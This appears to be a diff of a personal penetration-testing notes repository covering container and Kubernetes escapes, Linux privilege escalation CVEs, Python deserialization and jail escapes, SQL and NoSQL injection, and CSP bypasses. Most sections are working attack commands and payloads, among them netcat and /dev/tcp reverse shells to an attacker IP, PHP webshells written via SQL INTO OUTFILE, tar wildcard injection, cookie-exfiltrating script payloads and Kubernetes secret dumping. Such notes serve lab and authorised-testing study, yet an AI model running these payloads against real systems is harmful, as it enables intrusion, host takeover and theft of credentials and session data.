* [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.)
* Exploit and get a reverse shell to the host via
```sh
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/exploit" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /exploit
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER_IP 4711 >/tmp/f" >> /exploit
chmod a+x /exploit
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```
* The file may appear outside the container on the host system
## Check fdisk
* `fdisk -l` and `lsblk`, host bulk device may be exposed
* Mount the device
```sh
mkdir /mnt/hostdev
mount /dev/<hostVda> /mnt/hostdev
```
* Check `/dev` as well !!! and mount device
## Creating a Container from inside another container
* Needs root inside a container
* Upload [static curl](https://github.com/moparisthebest/static-curl)
* Check available images and containers
```sh
curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/containers/json
curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/images/json
```
* Inside the container as root
```sh
curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock http://localhost/containers/create -d '{"Detach":true,"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Tty":false,"Image":"<imagename>:latest","HostConfig":{"Binds": ["/:/var/tmp"]},"Cmd":["sh", "-c", "echo <ssh-key> >> /var/tmp/root/.ssh/authorized_keys"]}'
```
* Return value is the ID
* Start a container
```sh
curl-amd64 -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start
```
* Login in to the host via ssh remotely or socat locally
```sh
socat - UNIX-CONNECT:/var/run/docker.sock
POST /containers/<CONTAINERID>/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
Host:
Connection: Upgrade
Upgrade: tcp
HTTP/1.1 101 UPGRADED
Content-Type: application/vnd.docker.raw-stream
Connection: Upgrade
Upgrade: tcp
```
## Escape through DB
* Login into DB
* Create table
* Inject PHP code
* Select table content intoa file the user can read
* Execute the file
```sql
create table h4x0r (pwn varchar(1024));
insert into h4x0r (pwn) values ('<?php $cmd=$_GET[“cmd”];system($cmd);?>');
select '<?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE '/var/www/html/shell.php';
```
* curl the webshell hon the exploited host
```sh
curl <host-IP>/shell.php?cmd=id
```
## Dirty c0w
https://github.com/dirtycow/dirtycow.github.io
## runC
[CVE-2019-5736](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/)
## Securing a Container
* Least Privileges
* Seccomp
* Securing Registry via TLS
## Checking if you are inside a container
* Low process count
```sh
ps aux
```
* `.dockerenv` in `/`
```sh
cd / && ls -lah
```
* cgroups contain docker names
```sh
pwd /proc/1
cat cgroups
```

@ -1 +0,0 @@
Subproject commit 63a7ba9787c53857b299a728744f4d120795bf20

View File

@ -1,59 +0,0 @@
# Kubernetes
* Check [kubeletctl](https://github.com/cyberark/kubeletctl.git) as well
## Account Token
* Snatch an account token from inside a pod
* Use it via kubectl, watch out for authorizations and namespaces
```sh
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 auth can-i --list
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get namespaces
```
* Save secrets from namespaces as yaml file
```sh
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get secrets -o yaml -n kube-system > kube-system.yml
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get secrets -n kube-system
```
* Specify secret
```sh
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get secrets flag -n kube-system -o yaml
```
## Privilege Escalation
* [appsecco's blog](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216)
* Show images via
```sh
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get pods
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get pod <image> -o yaml
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get nodes -o yaml
```
* Use a found image to create the following yaml file
```yaml
apiVersion: v1
kind: Pod
metadata:
name: attacking-pod
spec:
containers:
- image: <image name in found containers/nodes section>
name: <name of image in found containers/nodes section>
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
volumeMounts:
- mountPath: /host
name: host
volumes:
- name: host
hostPath:
path: /
type: Directory
```
* `/` of the node is mounted to `/host` inside the new pod
* Create the pod via
```sh
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 apply -f <filename.yaml>
```
* Run an interactive session on the pod
```sh
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 exec -it attacking-pod -- /bin/bash
```

View File

@ -1,32 +0,0 @@
# LXC
## Privilege Escalation
### Member of lxd Group
* [Hackingarticles article](https://www.hackingarticles.in/lxd-privilege-escalation/)
* User has to be in `lxd` group, not necessarily `sudo`.
#### Usage
* Clone and build
```sh
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builde && sudo && ./build alpine
```
* Upload to target
* Import alpine image
```sh
lxc image import ./alpine-v3.14-x86_64-20210920_2132.tar.gz --alias myimage
```
* Prepare image
```sh
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
```
* Host `/` is mounted at `/mnt/root` inside the container
* `root` directory is at `/mnt/root/root`

View File

@ -1,39 +0,0 @@
# MicroK8s
## Usage
* Create `pod.yaml` configuration
```yaml
apiVersion: v1
kind: Pod
metadata:
name: harry-podder
spec:
containers:
- name: shell
image: localhost:47111/alpine
command:
- "/bin/bash"
- "-c"
- "sleep 10000"
volumeMounts:
- name: root
mountPath: /mnt/root
volumes:
- name: root
hostPath:
path: /
type: Directory
```
* Deploy the pod
```sh
microk8s kubectl apply -f pod.yaml
```
* Run the Pod
```sh
microk8s kubectl exec -it harry-podder -- /bin/bash
```

View File

@ -1,14 +0,0 @@
# Capabilities
* [HackTricks](https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities)
## Usage
* Find capabilities
```sh
getcap -r / 2>/dev/null
```
* `cap_setuid` through `/bin/perl`
```sh
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh"'
```

@ -1 +0,0 @@
Subproject commit e1fd1f65caa686bbb1510ae07efbdc3a0e4b8330

View File

@ -1,15 +0,0 @@
# CVE-2022-0847
* [Max Kellerman's post](https://dirtypipe.cm4all.com/)
* 5.8 < Vulnerable kernels < 5.10.102
* If a file can be read, it can be written also.
## Usage
* `splice(2)` moves data between files and through pipes without copying between kernel and user adress space
* Anonymous pipes permissions are not checked
* Read only permissions on pages do not matter on a pipe level
* Splice is putting data into the pipe and malicious data afterwards in the same one to overwrite the mem page
* `PIPE_BUF_FLAG_CAN_MERGE` flag has to be activated in order to write back to a file
* Works as long as there is an offset to start of a page in the beginning of the writing

View File

@ -1,12 +0,0 @@
# CVE-2021-22204
* Craft an a payload and execute it via exiftool
* [Article](https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/)
## Usage
* Payload is `(metadata "\c${system('id')};")`
```sh
sudo apt install djvulibre-bin
bzz payload payload.bzz
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz
```

View File

@ -1,3 +0,0 @@
# Groups
* [steflan-security](https://steflan-security.com/linux-privilege-escalation-exploiting-user-groups/)

View File

@ -1,56 +0,0 @@
# LD_PRELOAD
* Preload libs and do interpositioning of functions.
* `man ld.so`
* `man dlsym`, `dlsym()` calls the original function
## Example 1
* Interpositioning of `_init()`
```sh
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
```
* `gcc -fPIC -shared -o lib.so lib.c -nostartfiles`
* `sudo LD_PRELOAD=lib.so apache2`
* `$ id`
## Example 2
* Interpositioning of `write()`
```C
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h> // Contains _GNU_SOURCE from man dlsym
#include <string.h>
ssize_t write(int fildes, const void *buf, size_t nbytes)
{
ssize_t result;
do the thing;
return result;
}
```
* In case the symbol lookup returns an error libdl is linked
```sh
gcc -ldl interpositioning.c -fPIC -shared -D _GNU_SOURCE -o interpositioning.so -ldl`
```
## Preloading
* Dependent on the installation status of lib32 and/or lib64 and various packages the path of `LD_PRELOAD` has to be set differently. These may look as follows
* `LD_PRELOAD=./interpositioning.so <binary>`
or
* `export LD_PRELOAD=$(pwd)/interpositioning.so`
or
* Global preload via `/etc/ld.so.preload`
or
* Change the preload path via `LD_PRELOAD_PATH`
* Verify via `ldd <somebinary>`

View File

@ -1,21 +0,0 @@
# NFS RootSquash
* [hacktricks](https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe)
* `no_root_squash` has to be as an option on the NFS device
## Usage
* `showmount -e <target-IP>`
* `mkdir /tmp/net_volume`
* Connect to NFS share
```sh
mount -o rw,vers=2 <nfsShare-IP>:/tmp /tmp/net_volume
```
* Create root shell inside the dir of the share
```sh
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/net_volume/shell.c
gcc /tmp/net_volume/shell.c -o /tmp/net_volume/shell
chmod +s /tmp/net_volume/shell
```

View File

@ -1,6 +0,0 @@
# CVE-2021-3493
* Kernel module, enables aggregation of mountpoints in a single tree of which parts are writeable others are not
* [Exploit](https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/)

View File

@ -1,11 +0,0 @@
# CVE-2021-4032
* [Qualys put it in the open](https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt)
* [arthepsy's exploit](https://github.com/arthepsy/CVE-2021-4034)
* Arg counting starts at 1 inside pkexec logic
* `execve( "/usr/binpkexec", (char **){NULL}, env)` puts NULL into argc[1]
* The value behind NULL can be overwritten, which is the first env param

View File

@ -1,40 +0,0 @@
# CVE-2021-3560
* Exploit `< 0.105-26ubuntu1.1`
## Racing Condition
* Request creation of account via dbus message and `pkexec`. sleep time is variable.
```sh
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:user1 string:"New Account" int32:1 & sleep 0.005s; kill $!
```
* Create password via `openssl passwd -6 -salt salt password123`
```sh
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$salt$cevuzTZ/QBjzuZG0/ebEeedmcTnhyM8ITUu8K032Cp2XvIibq7voqYagm18bwpLBqrg/l/l6YxTmKKibJz5r10' string:'New Password' & sleep 0.005s; kill $!
```
* Request is killed after polkits receives it
* Polkit requests uid of user who sent the message, which has been deleted
* Error will be thrown
* Uid turns to root afterwards
* Request succeeds
* `su user1` and `sudo -s`
# Priv Esc with Two Sessions
* User has to be member of group `sudo`
* Open two ssh sessions
* In session one check the PID
```sh
echo $$
```
* In the other session
```sh
pkttyagent --process <PID of s1>
```
* In session one do
```sh
pkexec "/bin/bash"
```
* Enter password in session two

View File

@ -1,22 +0,0 @@
# Racing Conditions
## Read files from another user
* The file of interest needs to be opened by a process which is a suid binary (here named `read_reds`) and creates a file descriptor to it
* The file of intereset is called `root_credentials` and is owned by root
* Create a file
```sh
touch yo
```
* Compile `gistfile.txt` from [live overflow's repo](https://gist.github.com/LiveOverflow/590edaf5cf3adeea31c73e303692dec0)
```sh
gcc gistfile.c -o rename_file
```
* Inside session 1 start the binary
```sh
./rename_file yo root_credentials
```
* Inside session to try to read `root_credentials` until it succeeds
```sh
./read_creds root_credentials
```

View File

@ -1,13 +0,0 @@
# setcap
* Set capabilities of a binary
* [Hacktrick's setuid page](https://book.hacktricks.xyz/linux-hardening/privilege-escalation/euid-ruid-suid)
## Usage
* If there is an S-bit or sudo on setcap do the following. Copy python binary and
```sh
setcap cap_setuid+ep /absolute/path/to/copied/python3
python3 -c "import os; os.setuid(0); os.system('/bin/bash')"
```

View File

@ -1,24 +0,0 @@
# Shared Object Injection
* [gaffe23](https://github.com/gaffe23/linux-inject)
* [exploit-db](https://www.exploit-db.com/papers/37606)
* Test binary via
```sh
strace <binary> 2>&1 | grep -i -E "open|access|no such file"
```
## Example
```sh
#include <stdio.h>
#include <stdlib.h>
static void inject ( ) __attribute__ ( (constructor) );
void inject ( ) {
system ( "cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p" );
}
```
* `gcc -fPIC -shared -o ~/.config/lib.so ~/.config/lib.c`
* Run binary using the lib

View File

@ -1,6 +0,0 @@
# Shell Shock
* Check target via
```sh
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://<target-IP>/cgi-bin/test/test.cgi
```

View File

@ -1,9 +0,0 @@
# CVE-2019-14287
* Versions < 1.8.28
## Usage
* Integer overflow with resulting root status.
```sh
sudo -u#-1 <app>
```

View File

@ -1,4 +0,0 @@
# Sudo pwnge with pwfeedback()
* Sudo version 1.7.1 to 1.8.30
* [Saleem's github](https://github.com/saleemrashid/sudo-cve-2019-18634)

View File

@ -1,14 +0,0 @@
# CVE-2021-3156 Baron Samedit
* [Animesh Jain's blog post on Qualys](https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit)
* [blasty's PoC](https://github.com/blasty/CVE-2021-3156.git)
* Heap based overflow
* Versions 1.8.2-1.8.31p2, 1.9.0-1.9.5p1
* Check vulnerability via
```sh
sudoedit -s '\' $(python -c "print('\x41' * 10000)")
```
* Defaults to try
```sh
./brute.sh 90 120 50 70 150 300
```

View File

@ -1,14 +0,0 @@
# Reusing Sudo Token
* Reuse sudo token of currently logged in user
* [Hacktricks' site](https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens)
* `ptrace` has to be fully enabled
```sh
cat /proc/sys/kernel/yama/ptrace_scope
0
```
* sudo has to be triggered the last 15 minutes, check `ps wuax`
* `gdb` has to be installed
* One must be logged in as the same user which should be owned
* Use [nongiach's exploit](https://github.com/nongiach/sudo_inject)

View File

@ -1,26 +0,0 @@
# Wildcard usage
* [Leon Juranic has shown it](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/)
## Another Example
* cronjob gets backup data from `/var/www/html` via `tar cf backup.tar *`. The reverse shell and the parameters need to be files in this directory to get called by tar and be executed.
```sh
echo "mkfifo /tmp/oytqnhq; nc <IP> <PORT> 0</tmp/oytqnhq | /bin/sh >/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > "--checkpoint=1"
```
or
```sh
echo "mkfifo /tmp/oytqnhq; nc <IP> <PORT> 0</tmp/oytqnhq | /bin/sh >/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > /var/www/html/shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
```
## touched Filename Options
* Give full permissions on all the files
```sh
touch './"";$(chmod 777 *)'
```

@ -1 +0,0 @@
Subproject commit 9e003a3196570a8e882e55cf9824fd3bf98886be

@ -1 +0,0 @@
Subproject commit 859781b834244774cb509e96ccc29ee646f72739

@ -1 +0,0 @@
Subproject commit 784eada6cd08739032b7fdc124a8c93abcb0c2f7

View File

@ -1,9 +0,0 @@
# MAC Spoofing
```sh
macof -i <interface>
```
or
```sh
ettercap -T -i <interface> -P rand_flood -q -w file.pcap
```

@ -1 +0,0 @@
Subproject commit 50e4a3e2bf5dfff5699440b3ebc61ed1b5c49bbe

View File

@ -1,16 +0,0 @@
# PadBuster
* [AeonCyberLabs' github](https://github.com/AonCyberLabs/PadBuster.git)
* Padding Oracle
## Usage on Cookies
* Oracle on cookievalue, use website error message of invalid padding
* A high privileged user account can be added as a target
```sh
./padBuster.pl http://10.10.135.100/index.php 3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3 8 -cookies "hcon=3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3" -error "<website error>"
```sh
./padBuster.pl http://$TARGET_IP/index.php 3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3 8 -cookies "session=3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3" -error "<website error>" -plaintext '<user>=<username>'
```

View File

@ -1,10 +0,0 @@
# Code Injection
* Python's `input()`, `exec()` and `eval()` makes it possible
## Usage
* Payload example
```python
eval("__import__('os').system('bash -i >& /dev/tcp/$TARGET_IP/$TARGET_PORT 0>&1')#")
```

View File

@ -1,36 +0,0 @@
import zlib
import sys
import json
from itsdangerous import base64_decode
def decode(cookie):
"""
Decode a Flask cookie
https://www.kirsle.net/wizards/flask-session.cgi
"""
try:
compressed = False
payload = cookie
if payload.startswith('.'):
compressed = True
payload = payload[1:]
data = payload.split(".")[0]
data = base64_decode(data)
if compressed:
data = zlib.decompress(data)
return data.decode("utf-8")
except Exception as e:
return f"[Decoding error: are you sure this was a Flask session cookie? {e}]"
cookie = sys.argv[1]
data = decode(cookie)
json_data = json.loads(data)
pretty = json.dumps(json_data, sort_keys=True, indent=4, separators=(",", ": "))
print(pretty)

View File

@ -1,18 +0,0 @@
# Escaping Jails
* [Aneesh's blog](https://anee.me/escaping-python-jails-849c65cf306e?gi=a7d3bac81831)
## Usage
* Circumvent via `__builtins__`
```python
dir(__builtins__)
```
```python
__builtins__.__dict__
```
* Call builtins
```python
__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('/bin/bash -p')
```

View File

@ -1,22 +0,0 @@
# Library Hijacking
* [Article](https://medium.com/analytics-vidhya/python-library-hijacking-on-linux-with-examples-a31e6a9860c8)
## Interpreter might be called invoking sudo
* Write into a library called inside the script
## Path call order of packages
* Order of paths which are invoked to find packages may be found via
```sh
python -c 'import sys; print("\n".join(sys.path))'
```
* Higher order directory on a path may have write permission. Insert a similar named package that gets called in the script.
* The highest order is `pwd`
## Redirecting PYTHONPATH
* `SETENV` may be set while loading script through `sudo`
```sh
sudo PYTHONPATH=/tmp/ /usr/bin/python3.6 <script.py>
```

View File

@ -1,21 +0,0 @@
# Pickle
## Payload
* Inject payload
```python
import pickle
import os
import base64
class evil_object(object):
def __reduce__(self):
return(os.system, ('/bin/bash',))
x = evil_object()
x = evil_object()
y = pickle.dumps(x)
base64.b64encode(y)
```
* Dump serialized object via
```python
pickle.dump(SerializedPickle(), open('pickled.out', 'wb')
```

View File

@ -1,3 +0,0 @@
# Pwntools
* [Docs](https://docs.pwntools.com/en/stable/)

View File

@ -1,5 +0,0 @@
# Decompile PYC
```sh
uncompyle6 file.pyc
```

View File

@ -1,4 +0,0 @@
# Scapy
* [Doc](https://scapy.readthedocs.io/en/latest/introduction.html)

@ -1 +0,0 @@
Subproject commit 5c98c5f40a0aefaf374904ab53d6c03ba5b7a003

View File

@ -1,12 +0,0 @@
# smbmap
* [Repo](https://github.com/ShawnDEvans/smbmap.git)
* `python3 -m pip install -r requirements.txt`
# Usage
* `-x` execute command on server
* `-s` enumerate share
```sh
smbmap -u "admin" -p "password" -H "10.10.10.10" -x 'ipconfig'
```

View File

@ -1,9 +0,0 @@
# MSSQL
# Usage
* `sqsh` as a shell
* After connection is established check `xp_cmdshell'
```sh
xp_cmdshell 'whoami';
```

View File

@ -1,38 +0,0 @@
# NoSQL Injections
* No tables, but files (collections)
* Examples are Elasticsearch, MongoDB, Redis, CouchDB.
## Querying
* Filter instead of SQL queries
* [Redis docs](https://redis.io/documentation)
* [MongoDB operators](https://docs.mongodb.com/manual/reference/operator/query/)
* [Elasticsearch docs](https://www.elastic.co/guide/index.html)
# Operators
* Most common
```sql
$and
$or
$eq
$ne
$gt
$where
$exists
$regex
```
## Tips & Tricks
* Pass HTTP parameter as an array instead of `user=` and `password=` use `user[$operator]=foo` and `password[$operator]=bar`
* 2D array via `user[$nin][]=foo`
## Example
* POST or GET parameters
```sh
username=admin&password[$ne]=admin
```
* JSON
```json
{"username":"user","password":{"$ne":""} }
```

View File

@ -1,157 +0,0 @@
# SQL Injection
* [MySQL Comments](https://blog.raw.pm/en/sql-injection-mysql-comment/)
## Finding an Opportunity
* GET parameter
```sh
http://example.com/index.php?id=' or 1=1 -- -
```
* Sometimes an ID or may come first
```sh
http://example.com/index.php?id=10 or 1=1 -- +
http://example.com/index.php?id=10' or '1'='1'-- -
http://example.com/index.php?id=-1' or 1=1 -- -&password=x
```
* Provoke error to gain information
```sh
http://example.com/index.php?id='
```
* **Incase of client side sanitization craft the URL instead of using the form!!!**
## Usage
* Example, terminate string via `'` and resolve via tautology, comment the rest of the string via `--`
```sql
SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- -
SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+
```
### Boolean True and False
```sql
SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+
SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+
```
* Blind boolean base substring fuzzing, one char at a time, by inspecting the return value after each inserted char.
```sql
' UNION SELECT null,null,null where database() like 'da%';-- -
```
### Time based
* Checking input blindly via sleep() function. Count number of cols in this way. If it is successful, the sleep(5) function executes
```sql
' union select sleep(3), null; -- -
```
### Blind injection // Guessing characters
```sh
http://example.com/?id=1' and substr((select database()),1,1) < 105 --+
```
```sh
http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+
```
* Function substr(string, start, length)
* sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump`
### Union based
* _First method__ check by order until error occurs
```sql
' order by 1 -- -
' order by 2 -- -
' order by 3 -- -
```
* __Second method__ fuzzing NULL values, followed by fuzzing data types
* Check number of cols
```sql
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
# until the error occurs
```
* Check which one is a string
```sql
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--
```
* Retrieve content, for cols and comment two times as an example. Or dump database
```sql
' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- //
' UNION SELECT NULL,username,password,NULL FROM users -- //
```
* Retrieve content by union poking the count and order, afterwards extracting tables via
```sh
0 union select null, null, database()
0 union select null, null, group_concat(table_name) from information_schema.tables where table_schema = 'found_db'
0 union select null, null, group_concat(column_name) from information_schema.columns where table_name = 'found_tablename'
0 union select null, null, group_concat(username, ':', password from found_tablename
```
* [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection)
### Identify Database
```sh
id=sqlite_version()
id=@@version # mysql/mssql
id=(SELECT banner FROM v$version) # oracle
```
#### SQL Functions
* Use sql functions to fumble the tables & cols via union
* [source](https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a5635)
* Extract tables
```sql
1' and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database() -- -
```
* sqlite specific
```sql
' UNION SELECT sql, sql FROM sqlite_master -- -
```
```sql
(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable')
(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%')
```
* Extract cols
```sh
1' and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema = database() and table_name ='user'-- -
```
* Data from cols
```sql
1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- -
```
## Insert
* Check user file permissions
```sql
union all select 1,group_concat(user,0x3a,file_priv),3,4 from mysql.user -- -
```
* Insert file through insertion of `system()` or `exec_shell()` and a get parameter
```sql
<cookieID>'into outfile '/var/www/html/shello.php' lines terminated by 0x3c3f706870206563686f20223c7072653e22202e2073797374656d28245f4745545b22636d64225d29202e20223c2f7072653e223b3f3e -- -
```
* Insert `<?php system($_GET["cmd"]); ?>`
```sql
" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '/var/www/html/shell.php' -- -
```
### Examples
* sqli inside HTTP request to an API. Five values inside select have been discovered before
```HTTP
GET /about/0 UNION select column_name, null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1
```
* Get col names
```HTTP
GET /about/0 UNION all select group_concat(column_name), null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1
```
* Get notes from users by id
```HTTP
GET /about/0 UNION all select notes, null, null, null, null from users where id = 4711 HTTP/1.1
```
## Payloads
* [List](https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads)

View File

@ -1,43 +0,0 @@
# SQLmap
* [sqlmap](https://github.com/sqlmapproject/sqlmap.git)
* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)
## Usage
* Use `-r` with a saved HTTP request
```sh
sqlmap -r request.txt --dbms=mysql --dump
sqlmap -r request.txt --batch
```
* Select form data automatically
```sh
sqlmap -u http://<target-IP>/site.php --forms --dump-all
```
* [Get reverse shell via sqlmap](https://www.hackingarticles.in/shell-uploading-in-web-server-using-sqlmap/)
|Parameter|Details|
|-r|Uses the intercepted request save as a file|
|--dbms|DBMS of target|
|--dump|Dump the entire database|
|--dump-all|Dump everything|
|-p |TESTPARAMETER|
|--os-shell|Prompt for an interactive operating system shell|
|--os-pwn|Prompt for an OOB shell, Meterpreter or VNC|
|--tables|Show tables|
|-T|Specify table|
## Other Tools
### Damn Small SQLi Scanner (DSSS)
* [Script](https://github.com/stamparm/DSSS.git)
```sh
python dsss.py -u "http://example.com/index.php?id="
```
### Online sqlmap
* [Link](https://suip.biz/?act=sqlmap)

View File

@ -1,8 +0,0 @@
# Heartbleed
* SSL V1.0.1 and V1.0.1f
* Client sends msg, msglength
* If msg is 0 and the msglength is longer, return from server is arbitrary memory content
* [Heartbleed](https://heartbleed.com)

@ -1 +0,0 @@
Subproject commit 72261c4fcd39601effa474274608347033e1d492

View File

@ -1,18 +0,0 @@
# Bypassing Rate Limit
* [Infosecwriteups article](https://infosecwriteups.com/bypassing-rate-limit-like-a-pro-5f3e40250d3c)
* [Another infosecwriteups article](https://infosecwriteups.com/no-rate-limit-use-like-a-pro-33fc76744a17)
* [Hacktricks' site](https://book.hacktricks.xyz/pentesting-web/rate-limit-bypass)
# Usage
* Add one of the following lines to the header in round robin
```sh
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1
X-Forwared-Host: 127.0.0.1
```

View File

@ -1,19 +0,0 @@
# Command Injection
* Blind injection
* Verbose injection
## Blind Injection
* Check via ping, open a `tcpdump` on ICMP to listen for packets
* Redirect to logfile and read
* Use `sleep` or `timeout` to check if ci is possible in general
## Functions
* Watch out for
* `eval()`
* `exec()`
* `passthru()`
* `system()`

@ -1 +0,0 @@
Subproject commit 1a518ddf695ae3093ff637c5958802715e890d88

View File

@ -1,52 +0,0 @@
# Content Security Policy (CSP)
* Either in HTTP header or inside DOM's HTML
* [CSP directives](https://content-security-policy.com/#directive)
* [CSP evaluator](https://csp-evaluator.withgoogle.com/)
* [Bypassing csp](https://blog.0daylabs.com/2016/09/09/bypassing-csp/)
## Sources
* `*` wildcard
* `none`
* `self` for sources delivered through the same protocol
* `default-src 'self';` may not load any script
* `unsafe-inline`
* `unsafe-eval`
* `test.com` loads resources from domain but not subdomains
* `*.test.com` loads resources from subdomains
* `data:<content-type>...` critical usage
* `nonce` loads if nonce is correct. `sha256`, `sha384`, `sha512`
* [style hasher](https://report-uri.com/home/hash)
## Usage
### JSONP
Find JSONP endpoints through which to use custom callback functions
* [JSONBee](https://github.com/zigoo0/JSONBee)
```sh
"><script+src="https://bebezoo.1688.com/fragment/index.htm?callback=alert(1337)"></script>
```
### Misconfiguration
Insert payload into `src` attribute
### Exfiltration
* [Beeceptor](beeceptor.com)
* Local webserver
* `connect-src` while Ajax/XHR requests are enabled
* Disguising as an `image-src` or `media-src` source
```html
<script>(new Image()).src = `https://example.com/${encodeURIComponent(document.cookie)}`</script>
```
other payloads
```sh
<link id="csp" rel=stylesheet href="" /><script nonce="abcdef">document.getElementById("csp").href="http://<attacker-IP>:8000/" + document.cookie;</script>
```
*
```sh
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.3/prototype.min.js" integrity="sha512-C4LuwXQtQOF1iTRy3zwClYLsLgFLlG8nCV5dCxDjPcWsyFelQXzi3efHRjptsOzbHwwnXC3ZU+sWUh1gmxaTBA==" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.2/angular.min.js"></script>
<div ng-app ng-csp>
{{$on.curry.call().document.location='https://<attacker-IP>/' + $on.curry.call().document.cookie}}
</div>
```

View File

@ -1,22 +0,0 @@
# Cookie Tampering
## Components
* Separator is `;`
* Name
* Value
* Domain
* Path
* Expires/Maxage
